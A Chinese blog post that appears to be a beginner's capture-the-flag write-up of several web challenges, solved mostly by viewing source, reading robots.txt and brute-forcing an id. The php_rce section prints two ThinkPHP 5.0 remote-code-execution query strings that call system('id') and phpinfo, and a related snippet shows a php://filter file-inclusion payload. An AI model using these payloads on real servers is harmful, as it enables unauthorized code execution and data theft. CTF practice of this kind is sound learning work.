CTF:攻防世界web PART01

最新推荐文章于 2022-06-21 17:55:34 发布
最新推荐文章于 2022-06-21 17:55:34 发布
阅读量190 收藏 1
点赞数
分类专栏: CTF-WEB 攻防世界web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Q_U_A_R_T_E_R/article/details/119422206
版权

写在前面:
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除)

攻防世界web PART01

baby_web

在这里插入图片描述

  • 初始页面
    在这里插入图片描述
  • 第一反应是index.php
  • 输入发现不对
  • 那就用御剑扫一扫
    在这里插入图片描述
  • 扫不到任何有用的东西
    在这里插入图片描述
  • 那就F12一下
    在这里插入图片描述

在这里插入图片描述

  • 可以看到发过来的包里是有index.php的
  • flag{very_baby_web}
    在这里插入图片描述
  • get it

Training-WWW-Robots

  • robots
  • 想到了robots协议
  • 话不多说访问一下呗

在这里插入图片描述

  • 出现了一个路径
  • 访问一下
    在这里插入图片描述
  • cyberpeace{0b68a74e7506d5f6349a437023b041be}
  • get it

php_rce

  • 不知道rce是啥百度了一下
  • 大概是漏洞
  • 给了php的版本
  • ThinkPHP V5
  • 去找找看有无什么漏洞
    在这里插入图片描述
  • 去网上找了一个5.0的漏洞利用语句

在这里插入图片描述

  • 返回结果给了具体的版本号
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

在这里插入图片描述

  • ls查看目录
    在这里插入图片描述
  • 没什么有用的信息就继续往上查
    在这里插入图片描述
  • 找到flag
  • 但是貌似直接查找flag也行
    在这里插入图片描述
  • flag{thinkphp5_rce}
  • get it

Web_php_include

在这里插入图片描述

  • 传参数查看目录
    在这里插入图片描述
  • 使用linux命令访问
    在这里插入图片描述
  • 查看网页源码找到flag
  • get it

ics-06

在这里插入图片描述

  • 发现只有报表中心可以点开
    在这里插入图片描述
  • 看到url有个id
  • 爆破试试

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 就它突出
    在这里插入图片描述

在这里插入图片描述

  • cyberpeace{e4130164b5b97ade9aaeff8c28c16060}
  • get it

end
下机
吃饭

桃地睡不着
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
google-ctf:Google CTF
02-04
Google CTF 该存储库列出了2017-2019 Google CTF中使用的大多数挑战以及可用于运行这些挑战的大多数基础结构。 重要信息-2017、2018、2019和2020文件夹中的代码具有未修复的安全漏洞。 这些是故意存在的,并且在实际的生产基础结构上运行它们并不安全。 在此处了解有关Google CTF的更多信息: : 请注意,这不是Google的官方产品。
ctf:p4团队的ctf解决方案
02-05
P4小组的CTF撰写 2020年 2019年 2018年 2017年 2017.10.01 DefCamp D-CTF 2017 Quals (第5名/ 471队) 2017.03.25 InsomniHack 2017 (第七名/ 68组)现场 2016年 2016.01.23 2016年突破(第二名/ 152个团队) 2015年 [2015.10.20 Hack.lu CTF 2015 (第17名/ 248个团队)](2015-10-20 hacklu) 2015.09.05 MMA CTF 2015年第1名(第49名/ 672个团队)
攻防世界pacp1杂项
11-15
攻防世界pacp1杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127862299
CTF:CTF终端前端
03-15
CTF终端前端 从您的终端中的Capture The Flag锦标赛中获取并显示实时比分。 随着PEP和活力! 支持的CTF系统: 共享的开源系统: 定制的,一次性的或其他困难的客户: (通过ctfd后端) 对这些一次性系统的支持基于非公共API的反向工程或页面抓取。 结果,它们可能会停止工作,或者需要由同一组织者对将来的CTF进行一些调整。 例子 (单击以获取动画预览!) 用法 usage: ctfront.py [-h] [--frontend [FRONTEND [FRONTEND ...]]] [--list-frontends] [--backend BACKEND] [--list-backends] [--poll-interval POLL_INTERVAL] [--config CONFIG
ctf web基本步骤
热门推荐
小小白的博客
06-27 3万+
大家做ctf简单点的都可以用这些判断,基本上都会有,除非个别变态的。 1. 看源码 可以右键->【查看网页源代码】,也可以用火狐和谷歌浏览器的按F12键,按F12键可以修改html源代码方便构造一些值提交,但如果不需要的话直接右键查看源代码更直观,看网页里面的注释之类的都很方便。 2. 抓包 这几天接触到的抓包一般是用burpsuite,如果要多次尝试可以右键->【send t...
ctf-攻防世界-web:baby_web
一只菜鸟的博客
11-10 754
描述中提示想想初始页面是哪个,打开环境,默认主页在1.php。 php的初始页面一般为index.php,但是将1.php更改为index.php后,会自动跳转到1.php。 那我们改成index.php之后,使用burp进行抓包,右键send to repeater,点击go,发现显示flag is hidden,但是往上面返回包看看,可以找到flag ...
20220130---CTF WEB方向刷题WP-----网页初始index.php/robots.txt
qq_51550750的博客
02-01 1856
练习靶场—攻防世界 更多CTF靶场整理见 https://blog.csdn.net/qq_51550750/article/details/122748075 CTF WEB方向刷题WP—攻防世界—高手进阶场001–baby_web----考察网页初始index.php 题目描述:想想初始页面是哪个 网址:http://111.200.241.244:61887 访问http://111.200.241.244:61887 会直接跳转到http://111.200.241.244:61887/
CTF--baby_web
qq_40730029的博客
04-20 1753
CTF攻防世界高手进阶题 baby_web 题目:想想初始页面是哪个 进入场景之后显示如下,跳到的是1.php,用抓包软件burpsuite抓包 在抓取到的信息右键发送到Repeater 点击GO页面如下,发现flag出现了 ...
CTF baby_web
艺博东的博客
09-25 8467
题目描述:想想初始页面是哪个 题目场景: http://220.249.52.133:49388 1、点击链接进入一下界面 2、URL:把“1.php”为“index.php”—>回车 3、查看源代码(按F12或Fn+F12) 4、点中“Network”—>点击“index.php” 5、Response Headers—>FLAG: flag{very_baby_web} 6、OK flag{very_baby_web} ...
CTF babymips
zero
08-11 690
mips逆向,源码如下: #include <stdio.h> #include <string.h> char *check1="Q|j{g"; char *check2= "\x52\xfd\x16\xa4\x89\xbd\x92\x80\x13\x41\x54\xa0\x8d\x45\x18\x81\xde\xfc\x95\xf0\x16\x79\x1a\x15\...
ctf:现实世界CTF直播
03-22
ctf:现实世界CTF直播
CTF——攻防世界第一篇
01-08
昨天下午看了关于ctf的视频,发现自己什么也不懂,明明每个字都是我认识的中文,但是组合到一起就不明白了。「我好难……」 而且,看视频我似乎没什么的耐性,一下午下来还是发现自己没学到什么。所以,今天,我决定...
saigar-ctf:Saigar CTF 平台
05-29
赛加尔CTF世界上第一个众包调查的 CTF 平台介绍Saigar CTF 是一个开源 CTF 平台,用于促进众包调查,可以扩展到数百个具有实时数据的并发用户。 Saigar CTF 平台促成的最大事件有500 多个用户,在6 小时内提交了8,...
攻防世界miss-01,杂项misc太湖杯
11-01
攻防世界miss_01,杂项misc太湖杯。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127630023
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
CTF-网络挑战使用PHP在Web中进行CTF挑战链接: :
封神台——高校靶场ctf——第一期Web web_001
m0_52738557的博客
06-21 299
难度:⭐ 首先点击传送门打开相应的题目可以看到 这样一个画面,一个链接不到的反应,但题目以及告诉,F12就完事。 显然答案没有在这直接显示,再看看网络监视器查看传输中有没有什么线索可以看到flag出现了,但这是错误的答案,再通过源码看看数据包中有没有其他线索 可疑目标出现,有一个js文件我们点开得到一串提示, fromCharCode() 通过指定 Unicode 值,得到一个字符串 我们可以通过html的代码进行解析,在 菜鸟教程在线编辑器-fromCharCode() 中进行解析 将要转换的数据输入
CTF学习笔记——Include&Ping Ping Ping
Obs_cure的博客
09-20 1510
一、[ACTF2020 新生赛]Include 1.题目 2.解题步骤 点进去看了一下 根据题目猜测,应该是和php的文件包含漏洞有关…尝试了一下显示phpinfo,意料之中的失败了,看wp才了解到,这是一道伪协议的题目。然后翻了一下之前的博客,复制一下payload,成功解题。 ?file=php://filter/convert.base64-encode/resource=flag.php 3.总结 第二次做伪协议的题,只能说经验不足,辨识出来,下次遇见类似这种访问文件的题目时可以尝试。
[CTF][ACTF2020新生赛]include
凉水的博客
10-18 2815
解题思路 1 尝试 随便试了下几种目录穿越的方法,没有错误回显,没法判断是否成功。 …/…/ 以及file=xx.php等 2 换思路 简单试过后,发觉即使是目录攻击,这种无有效提示的攻击尝试方法,也是非常低效的。应该换个其它思路试一下。 翻出ctfer成长之路,这本书,看到php的漏洞利用,有filter以及zip协议等,灵机一动,考虑到php内容本身没有回显,会不会在php代码注释里,不管,先用filter试一下base64编码,试了一下,得到: ?file=php://filter/convert.b
CTF攻防世界web初级区详解
qq_62540010的博客
12-05 4145
最近几天刚刚接触了ctf,去尝试了一下攻防世界web区的新手篇题目,以下解题过程记录一下自己的学习体会与心得,如果哪里有错可以在评论区告诉我,我及时改正。 1.view_source 1.1获取场景后: 1.2根据题目要求,我们需要查看网页源代码,打开方式一种是鼠标右键打开,一种是按F12键,题目规定无法右键,所以我们按F12打开,如图: 1.3第二种解法:在其他网页打开源代码后把地址换成该网页地址,即view-source:后加上该网页地址,如图: 至此拿到flag,第一题完成 2.robot
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
最新发布
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值